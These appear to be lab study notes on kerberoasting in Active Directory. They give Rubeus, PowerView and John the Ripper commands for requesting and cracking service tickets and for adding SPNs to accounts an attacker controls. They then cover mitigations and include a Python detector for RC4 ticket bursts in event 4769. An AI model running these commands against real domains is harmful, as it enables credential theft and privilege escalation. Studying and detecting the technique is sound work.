kerberoasting
introduction
- to request a TGS you only need a valid domain user account (any user can request a service ticket for any SPN)
- get a TGT from the domain controller
- request a TGS for a service account's SPN; the ticket is encrypted with that account's password hash, so it serves as an offline-crackable authentication hash
- try to crack that hash offline
walkthrough
# list potential targets
PS> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
PS> Get-DomainUser -SPN
PS> C:\AD\Tools\Rubeus.exe kerberoast /user:serviceaccount /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
PS> C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
PS> . .\Invoke-Kerberoast.ps1
PS> Invoke-Kerberoast -Identity serviceaccount
Add a ServicePrincipalName to a user we have GenericAll on (so it becomes kerberoastable)
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}
PS> Get-ADUser -Identity support21user -Properties ServicePrincipalName | select ServicePrincipalName
PS> Set-ADUser -Identity support21user -ServicePrincipalNames @{Add='us/myspn21'} -Verbose
# then kerberoast again
With PowerView.ps1:
PS> Set-DomainObject -Identity support1user -Set @{serviceprincipalname='us/myspnx'}
# then try to get a TGS for the new SPN
- get kerberoasting ticket
- stealthy alternative: enumerate through LDAP
- crack kerberoasting ticket
- now I have the service account's password → hopefully this is an admin account
mitigation
- strong, long passwords for service accounts (so cracking the ticket is not feasible)
- least privilege: service accounts should not hold admin rights
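On the detection side, the usual signal is one account requesting RC4-encrypted service tickets (event 4769, TicketEncryptionType 0x17) for many user-owned SPNs in a short window. The following is an added example, not part of the original notes or of any tool mentioned above; the sample records and the field names are constructed to mirror the 4769 EventData fields, and the window and threshold are assumptions to tune against a baseline.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# TicketEncryptionType values that mean RC4 (the crackable case): 0x17 RC4-HMAC, 0x18 RC4-HMAC-EXP
RC4_ETYPES = {"0x17", "0x18"}

# Constructed sample 4769 records (fields mirror TargetUserName, ServiceName,
# TicketEncryptionType, IpAddress); not real log data.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:01", "account": "alice", "service": "sqlsvc",     "etype": "0x17", "ip": "10.0.0.5"},
    {"time": "2024-01-10T09:00:02", "account": "alice", "service": "httpsvc",    "etype": "0x17", "ip": "10.0.0.5"},
    {"time": "2024-01-10T09:00:02", "account": "alice", "service": "mssqlsvc",   "etype": "0x17", "ip": "10.0.0.5"},
    {"time": "2024-01-10T09:01:30", "account": "alice", "service": "svc_backup", "etype": "0x17", "ip": "10.0.0.5"},
    {"time": "2024-01-10T09:05:00", "account": "bob",   "service": "sqlsvc",     "etype": "0x12", "ip": "10.0.0.9"},
    {"time": "2024-01-10T09:06:00", "account": "carol", "service": "WS01$",      "etype": "0x17", "ip": "10.0.0.7"},
    {"time": "2024-01-10T09:00:00", "account": "dave",  "service": "sqlsvc",     "etype": "0x17", "ip": "10.0.0.8"},
    {"time": "2024-01-10T10:00:00", "account": "dave",  "service": "httpsvc",    "etype": "0x17", "ip": "10.0.0.8"},
]

def is_roastable_request(event):
    """RC4 service ticket for a user-owned SPN (computer accounts end in '$', krbtgt is the TGT)."""
    svc = event["service"]
    return (event["etype"].lower() in RC4_ETYPES
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=3):
    """Return {account: [services]} for accounts that requested RC4 tickets for
    at least `min_services` distinct SPNs inside any `window`-long interval."""
    by_account = defaultdict(list)
    for e in events:
        if is_roastable_request(e):
            by_account[e["account"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    findings = {}
    for account, reqs in by_account.items():
        reqs.sort()  # chronological, so each window starts at a request
        for i, (start, _) in enumerate(reqs):
            # distinct services requested in [start, start + window]
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                findings[account] = sorted(services)
                break
    return findings

if __name__ == "__main__":
    for account, services in find_kerberoast_bursts(SAMPLE_EVENTS).items():
        print(f"possible kerberoasting by {account}: {', '.join(services)}")
```

Real 4769 events need the fields pulled out of the event XML, and monitoring or backup software that legitimately touches many SPNs must be baselined; AES-only requests (0x12) should still be watched, since the RC4 filter only catches the common downgrade case.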